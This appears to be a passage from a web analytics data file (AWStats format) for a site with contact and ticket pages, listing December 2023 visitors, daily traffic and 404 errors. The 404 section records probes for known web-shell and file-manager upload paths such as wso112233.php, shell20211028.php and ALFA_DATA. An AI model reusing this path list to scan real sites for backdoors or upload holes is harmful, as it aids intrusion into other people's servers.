/modules/mod_simplefileuploadv1.3/elements/%C2%AE.php7 3 -
//h4xor.php 1 -
/wp-content/uploads/shell20211028.php 1 -
/zany.php 1 -
//wp-content/plugins/wordpresss3cll/up.php 2 -
/ms-admin.php 1 -
/yl10gohp.php 1 -
/wp-admin/meta/ 6 -
/jiema.php 1 -
//ee.php 2 -
/ws.php7 1 -
//lufix.php 1 -
/wp-admin/setup-config.php 3 proditelsas.com
/tinymce/plugins/filemanager/dialog.php 1 -
/wp-good.php 1 -
/wp-content/themes/wso112233.php 1 -
/assets/admin/js/tinymce/plugins/filemanager/dialog.php 1 -
//wp-includes/atom.php 1 -
//1.php 1 -
/ccx/index.php 2 www.google.com
/classsmtps.php 1 -
//wp-admin/images/license.php 1 -
//style.php 1 -
/assets/plugins/filemanager/dialog.php 1 -
//wp-content/plugins/real/v.php 1 -
//private.php 1 -
//.well-known/acme-challenge/install.php 1 -
/network.php 1 -
/edit-form-comment.php 1 -
/.well-known/pki-validation/about.php 2 -
//ton.php 1 -
/.well-known/pki-validation/xmrlpc.php 2 www.google.com
//wp-content/plugins/install.php 1 -
/load-scripts.php 1 -
/lib/jquery-file-upload/server/php/ 1 -
/wp-content/plugins/Uwogh-Segs/ 6 -
/options-head.php 1 -
/cgi-bin/iR7SzrsOUEP.php 2 -
//user.php 1 -
/wp-admin/repeater.php 1 -
/smm.php 1 -
/wboom.php 1 -
/main.php 1 -
/wp-content/themes/my-custom-theme/index.php 1 proditelsas.com
/file.php 1 -
/epinyins.php 1 -
/wp-admin/css/colors/sunrise/ 6 -
/wp-admin/js/widgets/xmrlpc.php 1 -
/wp-login.php 8 -
//tnt.php 1 -
//term.php 1 -
/ALFA_DATA/alfacgiapi/ 6 -
/.well-known/acme-challenge/shell20211028.php 1 -
//wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php 1 -
/wp-admin/home.php 1 -
/wp-content/auto_seo.php 1 -
/admin/filemanager/dialog.php 1 -
/options-discussion.php 1 -
/zeal.php 1 -
/wp-admin/css/colors/coffee/cloud.php 1 -
/custom-background.php 1 -
/wp-content/updates.php 1 -
/wp-content/plugins/wp-freeform/ 6 -
/9837wes.php7 1 -
/.well-known/pki-validation/wp-login.php 2 -
/godsend.php 3 -
//wp-admin/wp-trc.php 1 -
/wp-includes/random_compat/about.php 1 -
/wp-includes/IXR/ 6 -
/cobertura/pqr/contactenos.php 1 -
/wp-includes/home.php 1 -
//wp-content/uploads/ 1 -
/wp-admin/xl2023.php 1 -
//wp-admin/css/colors/blue/uploader.php 1 -
/wp-includes/blocks/ 6 -
/404.php 2 -
/wp-includes/images/crystal/ 6 -
/sellex.php 1 -
/admin-post.php 1 -
/wp-head.php 5 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 618
181.225.72.214 309 602 16629120 20231230072151
43.158.215.27 54 54 45218 20231209164628
154.38.173.47 36 36 98964 20231230140159
186.28.147.228 28 99 12263132 20231229134436
43.134.224.218 27 27 22609 20231204111200
84.54.51.41 19 19 15371 20231223153835
20.68.233.219 16 16 12944 20231231164949
138.84.40.188 14 32 14973708 20231219112715
31.220.101.1 13 13 10517 20231218215405
185.180.143.141 12 12 9708 20231215054634
190.146.0.15 11 38 11967461 20231228085023
181.119.64.134 10 10 28684 20231215135246
46.185.114.118 10 10 118740 20231209165619
149.56.150.88 10 10 135762 20231216194102
51.159.103.12 10 10 8090 20231210134453
172.225.238.105 9 40 22875805 20231223082510
159.224.217.252 9 9 106866 20231231030256
159.223.138.47 9 9 7281 20231220075020
181.78.71.171 8 46 5267530 20231218165057
167.172.120.173 6 6 4854 20231207024549
157.230.225.162 6 6 4854 20231207084026
144.126.131.216 6 6 16494 20231225094918
179.19.63.65 6 45 11366156 20231204193358
193.42.62.221 6 6 4854 20231218210626
167.94.138.35 6 6 4854 20231229161852
64.227.146.158 1 1 809 20231203021758
185.180.143.136 1 1 809 20231205232349
191.102.90.128 2 16 2286184 20231222113037
98.96.193.11 2 2 1618 20231222080002
172.81.58.40 2 2 5498 20231225103013
182.42.111.213 3 3 12792 20231226151011
68.183.79.104 1 1 809 20231217144601
174.138.72.88 1 1 809 20231231072206
152.32.169.36 3 5 4045 20231224143326
167.248.133.127 1 1 809 20231222234453
146.70.174.243 2 2 5498 20231207035315
190.129.164.132 1 15 2281920 20231227152151
45.146.54.9 1 1 2749 20231231001543
65.49.1.121 1 1 809 20231209203136
37.187.73.154 1 1 17038 20231207205552
107.189.8.181 1 1 4264 20231228054857
18.206.91.204 1 1 809 20231227100222
123.6.49.50 1 3 38068 20231228172102
87.236.176.218 1 1 809 20231213023318
167.71.134.235 1 1 4264 20231206052640
87.236.176.71 1 1 809 20231201070649
31.171.152.134 2 2 28912 20231203104919
64.62.197.216 1 1 809 20231225063026
123.6.49.15 0 2 3552 
5.254.43.249 2 2 5498 20231207154250
199.244.88.229 1 1 4264 20231206093320
194.36.96.39 2 2 5498 20231201185756
188.165.87.109 1 1 1737 20231213001247
62.133.46.8 2 2 1294 20231227133805
167.94.145.58 1 1 809 20231219042533
152.203.254.29 1 15 2281920 20231204123441
196.196.23.167 2 2 5498 20231220172152
64.62.197.74 1 1 809 20231211050133
94.156.64.213 1 1 17038 20231219143124
185.180.140.5 1 1 809 20231211210057
191.156.48.109 0 4 452229 
107.175.246.165 2 2 5498 20231218005829
167.94.138.127 2 2 1618 20231221173305
142.93.56.62 1 1 809 20231230141003
192.36.109.82 1 1 4264 20231227205447
64.62.197.91 1 1 809 20231218202605
167.94.146.57 5 5 4045 20231222035707
167.248.133.50 2 2 1618 20231214212621
167.99.160.30 1 1 809 20231208103332
45.38.44.64 2 2 5498 20231224065326
62.133.46.134 1 1 647 20231205023330
64.62.197.85 1 1 809 20231203231459
49.228.99.20 1 1 3072 20231213032328
207.244.118.219 2 2 5498 20231221050554
72.14.181.192 1 1 809 20231207024549
87.236.176.34 1 1 809 20231228193130
173.230.149.146 1 1 809 20231207084016
180.102.134.69 3 3 12792 20231214045902
190.129.164.169 1 15 2281920 20231209094148
37.187.215.254 1 1 1737 20231216165218
36.99.136.128 1 1 809 20231206024848
106.119.167.146 4 4 17056 20231230052806
206.189.131.210 1 1 809 20231221013415
143.244.154.39 1 1 809 20231218053634
185.180.143.71 1 1 809 20231205055611
172.94.48.11 2 2 5498 20231222103021
186.154.36.225 2 30 4563840 20231206091908
188.165.87.98 1 1 17038 20231212024959
20.94.215.56 2 2 7336 20231204065933
159.65.147.42 1 1 809 20231226100936
167.94.146.60 1 1 809 20231217011620
62.133.46.14 1 1 647 20231225061531
87.236.176.172 1 1 809 20231204063830
167.248.133.122 2 2 1618 20231212002151
37.46.113.158 2 2 6665 20231210012116
87.236.176.32 1 1 809 20231222204931
64.62.197.149 1 1 809 20231217202745
188.165.87.100 1 1 17038 20231213001307
89.149.87.89 2 2 23748 20231201022954
64.62.197.12 1 1 809 20231206045050
40.94.96.31 1 3 212491 20231207073142
87.236.176.189 1 1 809 20231214034352
167.94.145.54 1 1 809 20231228131409
194.33.45.121 1 1 2749 20231202155541
159.223.17.211 1 1 4264 20231226064418
199.244.88.220 0 2 1136514 
185.180.143.81 1 1 809 20231204153457
182.44.9.147 1 1 4264 20231226055312
186.155.13.26 1 15 2281920 20231223081755
94.102.61.45 2 2 1618 20231213132508
188.165.87.97 2 2 18775 20231229234206
188.166.168.137 1 1 809 20231216020347
160.20.10.83 1 1 2749 20231229133418
64.62.197.222 1 1 809 20231224215905
51.255.196.88 1 1 17038 20231218031555
182.42.110.255 1 1 4264 20231217011519
138.199.59.165 1 1 647 20231222090228
167.94.145.52 1 1 809 20231205020641
59.153.103.206 1 1 4264 20231221132259
43.133.66.151 1 1 4264 20231218093022
23.106.16.27 2 2 5498 20231210103844
162.216.149.179 1 1 1737 20231230030405
181.140.240.23 1 1 4264 20231229120358
46.29.251.215 3 3 9414 20231209150847
191.156.231.234 0 6 1500861 
51.158.64.154 1 1 3916 20231204055911
23.83.88.173 2 2 5498 20231206054221
95.181.236.144 1 1 647 20231216213603
139.59.3.148 1 1 4264 20231217102921
159.203.2.186 1 1 4264 20231230230547
189.28.85.131 1 15 2281920 20231227185944
159.223.233.255 1 1 809 20231207214816
95.214.53.103 4 4 6948 20231225120042
84.239.40.230 1 1 647 20231224071833
42.83.147.56 4 4 17056 20231219200705
45.131.194.206 1 1 2749 20231207071822
58.49.233.126 5 5 21320 20231221092313
37.19.223.213 3 3 40786 20231228203723
191.156.60.163 0 1 29972 
167.94.145.57 5 5 4045 20231229233238
65.49.1.16 1 1 809 20231221173513
167.248.133.123 1 1 809 20231204190224
212.30.37.86 2 2 5498 20231224213418
149.88.19.5 4 4 10996 20231213035909
199.244.88.231 0 5 226388 
192.227.232.155 2 2 1618 20231223020628
65.49.1.105 1 1 809 20231204173521
143.198.41.208 1 1 17038 20231214100429
190.26.9.227 1 15 2281920 20231218110412
193.32.162.174 1 1 809 20231222001325
40.94.96.60 0 2 257552 
62.133.46.138 1 1 647 20231211221203
149.34.252.54 2 2 5498 20231219055502
165.22.234.106 1 1 809 20231215002847
142.93.218.175 1 1 4264 20231202070545
103.149.192.9 1 1 809 20231206005353
141.138.211.251 1 1 4264 20231216155831
65.49.1.62 1 1 809 20231229222013
64.62.197.81 1 1 809 20231228071654
165.232.33.167 1 1 4264 20231222060938
34.238.255.164 1 1 809 20231231133834
65.154.226.167 1 1 4264 20231223142750
183.136.225.46 1 1 17038 20231214201613
167.94.145.60 2 2 1618 20231225113252
139.59.113.217 1 1 809 20231211124115
38.152.14.221 2 2 5498 20231204170346
185.180.143.16 1 1 809 20231226050531
186.154.201.2 2 30 4563840 20231218123200
64.62.197.180 1 1 809 20231212173630
146.70.192.180 0 1 2550 
182.42.105.85 1 1 4264 20231202070125
65.49.1.57 1 1 809 20231212173508
161.18.123.24 1 15 2281920 20231204083835
195.85.207.98 1 1 809 20231205003557
77.90.185.58 3 3 2427 20231218101943
82.67.12.164 2 2 34076 20231207152006
45.39.72.73 2 2 5498 20231213212312
195.176.3.24 1 1 4264 20231220171637
84.17.43.41 4 4 55183 20231216072148
167.248.133.125 1 1 809 20231231093143
185.180.143.11 1 1 809 20231204141007
203.2.64.59 1 1 4264 20231212030303
189.28.84.198 1 1 4264 20231227182052
64.62.197.196 1 1 809 20231227225021
203.33.203.148 2 2 8528 20231231110146
37.187.215.249 1 1 1737 20231212144446
173.239.254.37 1 1 2749 20231212173739
51.91.80.80 2 2 34076 20231229084049
190.26.133.22 1 1 4264 20231220125722
35.223.167.88 1 1 4264 20231212103017
64.62.197.178 1 1 809 20231222020845
84.239.14.179 1 1 647 20231205235347
206.189.178.222 1 1 809 20231221182744
58.246.58.150 5 5 64534 20231204230145
128.14.134.170 5 5 4045 20231229183401
162.142.125.217 2 2 1618 20231224074844
128.199.137.235 2 2 1618 20231221032908
36.99.136.136 1 4 5662 20231210202705
185.220.101.51 1 1 4264 20231218070604
87.236.176.65 1 1 809 20231219111141
43.131.62.4 1 1 4264 20231207055102
167.94.146.51 2 2 1618 20231225130346
205.210.31.219 1 1 1737 20231225194922
45.132.194.64 1 1 647 20231211131401
64.62.197.207 1 1 809 20231214232730
183.136.225.44 1 1 17038 20231221113529
159.223.216.170 1 1 809 20231205190019
125.94.144.102 2 2 8528 20231207234340
186.86.52.125 1 15 2281920 20231216051502
37.187.215.255 1 1 1737 20231224234026
212.30.37.110 1 1 2749 20231225092038
178.254.24.91 1 1 4264 20231217112944
34.219.169.56 1 1 17038 20231228141719
149.34.243.86 3 3 40786 20231212224152
157.230.44.126 1 1 809 20231226144806
84.247.115.19 3 3 40786 20231208232501
172.241.146.205 2 2 6665 20231218013614
196.242.131.93 2 2 5498 20231215175423
167.99.181.5 1 1 4264 20231210060413
23.106.22.24 2 2 5498 20231224162953
37.72.186.150 3 3 9414 20231202002641
159.203.94.75 1 1 809 20231212023545
111.7.96.167 1 1 809 20231227153707
3.82.144.127 1 1 3916 20231201071417
87.236.176.187 1 1 809 20231216110646
64.62.197.193 2 2 1618 20231231133645
43.159.128.68 1 1 4264 20231222042304
138.68.128.9 5 5 4045 20231219093859
159.89.50.177 1 1 4264 20231217105404
5.254.23.81 2 2 5498 20231220155746
170.106.101.31 2 2 8528 20231221013711
5.42.76.127 4 4 3236 20231227185944
209.45.4.10 1 15 2281920 20231228153139
157.230.188.103 1 1 4264 20231212063556
43.130.47.136 1 1 4264 20231227085855
167.94.138.51 2 2 1618 20231221111742
178.62.231.80 1 1 809 20231216052429
182.42.104.32 1 1 4264 20231204202306
154.202.121.55 2 2 5498 20231230093258
40.94.96.75 0 2 344388 
193.118.53.194 1 1 809 20231204131555
46.8.110.6 1 1 4264 20231216140007
20.120.74.197 3 3 7495 20231222034241
65.49.1.37 1 1 809 20231201045447
159.65.42.135 1 1 809 20231201152922
196.19.240.56 2 2 5498 20231218021546
18.206.222.105 1 1 809 20231225175344
40.94.227.95 0 1 174948 
190.144.60.50 1 15 2281920 20231229094239
216.24.213.185 2 2 23748 20231211132933
77.74.177.119 1 1 4264 20231226155342
167.94.138.34 2 2 1618 20231230232529
43.157.66.187 1 1 4264 20231211184037
34.213.173.1 1 1 4264 20231215055354
23.106.26.140 2 2 5498 20231206024832
51.159.101.214 1 5 4045 20231227065121
186.148.171.210 1 10 7841352 20231226174444
94.102.61.25 2 2 1618 20231219165736
58.53.218.148 5 5 34076 20231228200508
195.78.54.44 3 3 40786 20231225005735
3.133.114.242 4 16 97502 20231223132118
64.62.197.21 1 1 809 20231231133642
162.142.125.214 1 1 809 20231231092127
65.49.1.87 1 1 809 20231220135524
103.149.192.28 1 1 809 20231226124204
185.180.143.50 1 1 809 20231201003934
3.80.170.63 1 1 809 20231205160541
43.131.248.209 1 1 4264 20231219232715
47.88.62.42 2 2 6144 20231229003014
89.149.23.211 3 3 40786 20231215004204
128.90.43.156 1 1 0 20231208060619
185.196.9.87 1 1 809 20231201000846
185.180.140.6 4 4 3236 20231230172921
45.131.194.44 1 1 2749 20231210152637
23.83.81.236 2 2 5498 20231210145320
212.83.8.81 1 1 1737 20231213005433
149.88.28.4 2 2 5498 20231230200833
23.81.80.22 2 2 5498 20231229052303
192.241.143.118 1 1 809 20231229054732
188.165.87.107 1 1 17038 20231216233434
107.150.103.155 4 4 3236 20231220063316
159.65.24.27 1 1 4264 20231214070435
193.118.51.138 1 1 809 20231217025514
167.94.138.49 1 1 809 20231204095854
162.212.175.64 2 2 5498 20231222224640
65.49.1.118 1 1 809 20231202020021
87.236.176.101 1 1 809 20231228223848
139.59.58.181 1 1 809 20231216192230
64.23.148.21 1 1 4264 20231228052810
154.202.122.85 2 2 5498 20231219084157
51.159.101.211 2 10 8090 20231219204509
216.24.212.224 1 1 2749 20231224093741
43.130.32.224 1 1 4264 20231209163447
157.245.241.238 1 1 4264 20231231011209
188.166.25.202 1 1 4264 20231216063705
87.236.176.209 1 1 809 20231219122745
64.62.197.43 1 1 809 20231208231300
44.192.49.101 3 3 10408 20231203095517
185.134.22.149 2 2 1618 20231209021955
43.130.39.101 1 1 4264 20231216000640
35.203.211.195 1 1 1737 20231223021029
34.172.44.75 1 1 4264 20231226090838
91.201.113.112 1 1 17038 20231201083134
23.83.92.211 2 2 5498 20231206091330
193.176.86.58 3 3 40786 20231221004217
159.203.40.186 1 1 809 20231230033445
138.199.59.163 2 2 23748 20231212051705
138.68.99.220 1 1 809 20231228054628
201.244.241.221 1 15 2281920 20231205134812
64.62.197.241 1 1 809 20231212020621
191.156.59.97 1 4 298858 20231205080804
113.219.218.197 1 1 4264 20231202212828
120.71.59.24 2 2 8528 20231213205004
192.71.224.103 1 1 4264 20231202142420
35.203.210.155 1 1 1737 20231211060734
60.214.102.154 2 2 3474 20231204121155
66.249.70.101 1 1 1514 20231215111208
34.170.59.72 1 1 4264 20231205100737
38.152.7.70 2 2 5498 20231218095513
43.130.37.62 3 3 12792 20231224004959
190.27.188.61 1 10 4649342 20231215025705
46.246.106.46 5 5 59370 20231206020840
35.203.211.98 1 1 1737 20231201100609
23.108.48.28 2 2 5498 20231228202642
186.121.194.151 1 15 2281920 20231211092008
5.254.23.80 4 4 10996 20231206030903
128.14.133.58 2 2 1618 20231229152834
40.94.96.46 0 5 1187217 
87.236.176.50 1 1 809 20231201173422
64.62.197.136 1 1 809 20231219050040
64.62.197.209 1 1 809 20231213231639
23.82.110.197 2 2 5498 20231219132846
45.38.60.186 2 2 5498 20231208154045
35.89.255.49 1 15 2281920 20231201230501
37.187.215.245 1 1 1737 20231211015054
193.35.18.98 1 1 4264 20231205050746
188.165.87.96 1 1 1737 20231216233159
182.44.8.254 2 2 8528 20231217164857
159.89.125.251 1 1 809 20231206114611
199.244.88.230 1 4 312274 20231214064652
205.210.31.37 1 1 1737 20231227113232
185.180.143.72 1 1 809 20231205172949
194.36.98.159 2 2 5498 20231211042006
204.76.203.36 1 1 809 20231204091339
43.131.48.214 1 1 4264 20231223061001
111.172.249.49 1 1 4264 20231221194529
186.154.35.76 1 15 2281920 20231220133210
38.170.245.237 2 2 5498 20231225034404
191.156.224.121 1 9 781059 20231222125835
128.14.209.162 3 3 2427 20231215152533
152.32.139.190 4 4 3236 20231220131041
119.96.24.54 1 1 4264 20231228122721
51.159.100.248 5 5 4045 20231211044006
103.149.26.200 1 5 114757 20231224002219
40.94.227.29 0 1 255566 
167.248.133.38 1 1 809 20231221215747
188.165.87.103 1 1 1737 20231212025408
65.49.1.29 1 1 809 20231222173734
64.225.9.16 1 1 4264 20231230213050
65.49.1.108 1 1 809 20231220173704
165.154.51.221 3 5 4045 20231222041319
128.199.97.100 1 1 809 20231224130901
62.133.46.6 1 1 647 20231205123539
167.94.145.56 1 1 809 20231208031220
188.165.87.101 1 1 17038 20231229234113
138.186.137.213 2 2 5498 20231217095146
20.150.202.220 1 1 3916 20231207140654
199.244.88.218 0 1 1566 
125.75.66.97 3 3 12792 20231227011022
172.241.146.213 2 2 5498 20231227203313
40.94.227.46 1 2 37543 20231203073139
185.180.143.138 2 2 1618 20231208041242
167.94.138.126 1 1 809 20231225050848
35.203.210.37 1 1 1737 20231203123608
62.133.46.11 1 1 647 20231225120345
152.32.128.214 3 5 4045 20231230134533
41.0.52.234 2 2 6665 20231214084759
45.90.163.19 1 1 809 20231202175732
64.62.197.38 1 1 809 20231216173405
114.96.103.33 1 1 4264 20231218015936
196.247.18.214 2 2 5498 20231210110406
87.236.176.10 1 1 809 20231231183929
199.244.88.232 1 1 4264 20231227045524
185.181.60.189 1 1 4264 20231208115611
107.172.181.82 2 2 5498 20231221143046
144.217.135.178 1 15 2281920 20231216194118
200.122.228.203 4 20 6507352 20231211061528
194.36.98.26 2 2 5498 20231207053024
162.142.125.11 1 1 809 20231212153449
35.203.210.38 1 1 1737 20231210163958
123.6.49.18 0 1 2550 
167.248.133.53 2 2 1618 20231215210558
167.94.146.53 1 1 809 20231226164623
146.190.250.55 1 1 809 20231219013218
103.149.192.98 1 1 809 20231214074026
162.142.125.13 2 2 1618 20231226094238
34.215.136.251 1 1 4264 20231219060400
172.241.162.105 2 2 5498 20231204085730
143.244.158.244 1 1 4264 20231208074800
54.188.83.117 1 1 17038 20231211163701
191.156.53.255 1 3 346419 20231205080800
62.210.111.11 1 1 3072 20231202063900
134.209.0.95 1 1 809 20231213145743
23.106.27.161 2 2 5498 20231208051711
85.239.245.117 1 1 4264 20231204184547
162.142.125.216 1 1 809 20231218090512
3.95.23.35 1 1 3916 20231220093621
37.187.215.246 1 1 1737 20231229042828
170.106.171.77 1 1 4264 20231211022848
45.79.75.79 1 1 809 20231207084023
181.115.143.212 2 16 2286184 20231227124407
167.248.133.36 2 2 1618 20231224185830
60.188.57.0 3 3 12792 20231216154342
93.158.90.169 1 1 4264 20231208094023
141.140.11.227 2 2 5498 20231223174630
181.204.233.138 1 15 2281920 20231227064913
152.32.235.107 4 4 3236 20231220200605
181.53.251.182 1 15 2281920 20231222144613
23.80.147.32 2 2 5498 20231203200556
154.30.251.191 1 1 2749 20231205120215
142.93.148.65 1 1 4264 20231204052833
167.99.131.96 1 1 809 20231227060655
87.236.176.181 1 1 809 20231225210758
42.83.147.53 1 1 4264 20231220190059
198.46.225.114 2 2 5498 20231226143408
65.49.1.34 1 1 809 20231227004904
38.76.88.42 2 2 5498 20231207161632
186.29.32.1 2 16 2286184 20231220192148
154.28.147.204 2 2 6665 20231202085948
216.24.212.219 1 1 2749 20231224093746
45.120.50.53 2 2 5498 20231204074848
64.227.48.219 1 1 809 20231219151540
167.94.146.56 1 1 809 20231229093031
35.211.201.14 1 1 4264 20231209143612
178.168.115.145 5 5 59370 20231206195333
2.58.95.35 5 5 4045 20231226095233
123.6.49.47 0 1 317 
134.122.64.181 1 1 809 20231226073052
104.248.144.63 1 1 809 20231223033031
23.81.50.140 2 2 5498 20231206060353
160.20.225.61 1 15 2281920 20231212052204
146.190.235.55 1 1 809 20231205183108
170.64.188.20 1 1 809 20231219180932
104.236.72.46 1 1 4264 20231224071734
143.198.150.64 1 1 4264 20231202234855
124.226.222.66 1 1 4264 20231211093814
167.71.193.149 1 1 809 20231209080607
167.94.138.125 1 1 809 20231228060433
54.145.250.191 1 1 809 20231212175637
87.236.176.183 1 1 809 20231204175805
162.142.125.222 3 3 2427 20231228101808
159.223.140.199 1 1 809 20231231055604
37.19.223.13 3 3 40786 20231219185837
103.149.192.65 1 1 809 20231206005439
180.110.203.108 1 1 4264 20231208141738
87.236.176.199 1 1 809 20231222114709
209.58.151.96 2 2 5498 20231212011820
162.216.149.167 1 1 1737 20231231121006
54.188.249.122 1 1 4264 20231215055516
222.79.104.23 1 1 4264 20231220065540
165.22.100.167 1 1 809 20231219231242
23.83.88.84 2 2 5498 20231201043822
123.58.207.127 4 4 3236 20231221101957
62.210.90.176 5 5 4045 20231204040626
36.41.75.167 3 3 12792 20231228234647
65.154.226.170 1 1 4264 20231210213357
23.81.70.180 2 2 5498 20231212231152
209.38.248.159 1 1 809 20231206193319
190.60.101.159 2 16 2286184 20231219064021
66.94.97.45 4 4 10996 20231217080130
62.210.24.128 5 5 4045 20231224055238
143.198.32.26 1 1 809 20231207111100
170.64.183.200 1 1 809 20231224193352
167.94.146.59 1 1 809 20231224212718
208.91.68.5 1 1 0 20231228044745
40.94.227.61 0 1 341838 
84.17.48.10 3 3 40786 20231223085820
185.180.143.7 2 2 1618 20231204205502
190.67.250.6 1 15 2281920 20231226065313
34.208.215.212 1 1 4264 20231215055551
65.49.1.61 1 1 809 20231220135904
40.94.227.89 0 1 1566 
198.58.123.42 1 1 809 20231207024532
162.212.174.187 2 2 5498 20231210172552
157.230.60.182 1 1 809 20231230141013
186.31.138.105 1 15 2281920 20231222133842
162.216.149.181 1 1 1737 20231223180721
165.22.78.86 1 1 809 20231227035900
137.184.62.27 1 1 4264 20231230051643
167.248.133.187 1 1 809 20231203121351
103.149.192.245 1 1 809 20231226110919
191.102.90.129 4 18 2294712 20231206195010
152.201.219.238 1 15 2281920 20231207071634
87.236.176.159 2 2 1618 20231209224534
41.0.62.165 1 1 2749 20231218121725
23.90.165.44 1 1 809 20231227033031
101.36.120.120 4 4 3236 20231220200210
178.254.12.183 1 1 4264 20231227051435
23.106.27.65 2 2 5498 20231214191759
23.105.144.46 2 2 5498 20231212050534
185.180.140.4 1 1 809 20231211220528
167.99.179.78 1 1 4264 20231206200257
177.222.62.14 1 15 2281920 20231227150256
193.19.109.102 1 1 2749 20231212173744
109.248.14.213 1 1 4264 20231210085130
170.64.180.162 1 1 809 20231206120328
110.166.71.39 1 1 4264 20231223145034
134.209.228.100 1 1 4264 20231202235322
170.106.159.160 1 1 4264 20231207140013
157.245.241.166 6 6 4854 20231230141009
43.154.211.211 2 2 8528 20231212174838
35.203.211.59 1 1 1737 20231214155153
87.236.176.236 1 1 809 20231216154752
93.90.206.230 1 1 4264 20231212160512
79.142.79.83 5 5 59370 20231201045229
40.94.227.36 0 3 1157140 
65.49.1.56 1 1 809 20231229013525
188.165.87.108 1 1 1737 20231226020036
40.94.227.42 0 4 310244 
188.166.164.199 1 1 809 20231216220804
40.94.96.67 0 3 280272 
94.74.120.130 2 2 1618 20231202180734
206.189.46.142 1 1 809 20231215093043
23.106.26.84 2 2 5498 20231202174912
144.126.228.135 1 1 809 20231203193543
149.202.248.212 1 1 17038 20231226235418
199.244.88.228 1 4 609442 20231215032721
64.227.138.167 1 1 809 20231218084209
149.57.16.49 1 1 4264 20231225162642
45.131.194.60 1 1 2749 20231210152631
45.131.194.202 1 1 2749 20231207071817
178.254.12.205 1 1 3062 20231224125345
172.241.247.170 2 2 5498 20231224092820
163.172.184.218 2 2 0 20231204004634
23.94.107.14 2 2 1618 20231205033529
66.56.83.150 4 4 10996 20231229130046
87.236.176.39 1 1 809 20231207101521
103.187.190.2 1 1 809 20231213225840
185.220.101.59 1 1 4264 20231231022832
191.156.51.148 0 4 1158706 
51.159.101.212 1 5 4045 20231225160304
138.199.43.16 2 2 5498 20231214195107
152.32.216.172 3 3 2427 20231203120728
167.248.133.126 1 1 809 20231217075451
46.246.106.45 5 5 59370 20231212074510
36.111.67.189 1 1 4264 20231210015930
182.44.12.37 1 1 4264 20231225214240
107.150.103.88 4 4 3236 20231220073827
159.89.204.62 1 1 809 20231223190557
35.221.252.236 1 1 17038 20231229091223
45.146.54.13 1 1 2749 20231231001537
165.232.69.193 1 1 4264 20231220074552
36.99.136.137 3 4 35706 20231210111602
14.215.163.132 2 2 8528 20231222123746
185.180.143.137 1 1 809 20231202073606
192.126.199.175 2 2 5498 20231223160118
146.190.86.249 1 1 809 20231220081056
44.203.225.207 1 1 4264 20231211162330
121.5.238.46 1 1 4264 20231204080944
43.130.62.164 1 1 4264 20231219032009
87.236.176.185 1 1 809 20231210220023
170.64.187.189 1 1 809 20231221170212
103.102.228.215 2 2 17785 20231230071105
170.64.175.252 1 1 809 20231208142853
172.241.162.14 2 2 5498 20231210192036
196.244.4.40 2 2 5498 20231216213055
172.241.153.46 2 2 5498 20231225052535
188.166.65.156 1 1 809 20231209153613
221.2.155.200 1 1 4264 20231220191106
104.248.155.170 1 1 809 20231205031753
40.94.227.71 0 1 2550 
205.210.31.96 2 2 3474 20231226175100
159.89.175.214 1 1 809 20231210193043
167.94.145.59 2 2 1618 20231216134821
104.236.9.27 1 1 809 20231225221717
43.153.59.206 1 1 4264 20231204080943
104.206.162.250 3 3 9414 20231204173728
188.134.80.97 1 1 4264 20231203000930
162.221.192.26 2 2 1618 20231225202951
209.58.151.65 2 2 5498 20231218180416
93.158.90.69 1 1 4264 20231214162813
129.226.146.179 1 1 4264 20231208062152
162.216.149.242 1 1 1737 20231214061029
157.230.160.102 1 1 809 20231214014406
40.94.227.15 0 1 525 
162.142.125.224 1 1 809 20231201154921
181.78.78.237 1 15 2281920 20231229094329
165.232.189.218 1 1 809 20231222100445
167.94.138.124 4 4 3236 20231216023355
159.89.126.173 1 1 809 20231210080219
212.30.37.111 1 1 2749 20231225092033
154.6.130.9 1 1 647 20231215005449
185.180.143.8 4 4 3236 20231228155052
35.90.177.62 1 1 4264 20231203053820
103.149.192.53 1 1 809 20231214063414
84.239.14.186 1 1 647 20231210225633
101.91.148.219 3 3 12792 20231225112202
64.62.197.124 1 1 809 20231218021301
76.164.198.173 2 2 28912 20231216153827
43.135.129.233 1 1 4264 20231222220624
182.43.70.143 3 3 12792 20231227184019
34.229.210.177 1 1 809 20231211150218
34.29.82.74 1 1 4264 20231219102142
43.159.128.172 1 1 4264 20231225032306
64.62.197.22 1 1 809 20231221015504
196.242.47.249 2 2 5498 20231212195517
89.187.171.167 2 2 23748 20231226123318
179.7.65.85 1 15 2281920 20231229101549
223.244.35.77 1 1 4264 20231219124310
157.230.109.23 1 1 4264 20231218060725
167.248.133.184 1 1 809 20231209172516
181.143.222.90 1 15 2281920 20231220154749
193.177.182.119 1 1 809 20231204113102
137.184.106.14 1 1 4264 20231221052446
167.94.138.50 2 2 1618 20231221173157
190.2.58.205 2 16 2286184 20231212081221
69.167.28.173 1 1 0 20231230144308
185.174.103.1 2 2 5498 20231203100021
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20231201 37 79 7003521 28
20231202 39 39 97379 19
20231203 40 87 13403653 23
20231204 114 190 14649677 40
20231205 92 121 4816975 32
20231206 48 95 7047492 30
20231207 69 97 4768453 33
20231208 26 26 94025 20
20231209 77 91 2420684 17
20231210 43 43 89537 31
20231211 34 64 8873395 24
20231212 66 94 4848430 34
20231213 50 107 625427 22
20231214 47 61 2425357 23
20231215 49 58 4776160 25
20231216 52 80 4914778 32
20231217 21 21 47741 17
20231218 44 100 7635394 28
20231219 54 90 17383090 28
20231220 50 92 6937668 30
20231221 34 34 109391 25
20231222 32 90 9181338 25
20231223 42 99 25336057 24
20231224 33 39 178502 23
20231225 35 39 109470 27
20231226 26 49 10220287 23
20231227 33 107 11475534 28
20231228 130 355 18265479 27
20231229 55 182 21476834 26
20231230 39 42 86256 20
20231231 19 19 74804 17
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 1
2mn-5mn 11
30s-2mn 16
15mn-30mn 8
0s-30s 755
30mn-1h 5
5mn-15mn 5
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 53
/suspencion.php 560 482766 377 377
/ 299 1645764 254 228
/contactenos.php 289 1454368 122 142
/pqr/upload/scp/tickets.php 101 573604 6 7
/pqr/upload/scp/autocron.php 54 2268 0 3
/pqr/upload/scp/logo.php 43 134603 22 17
/index.php 29 200300 5 9
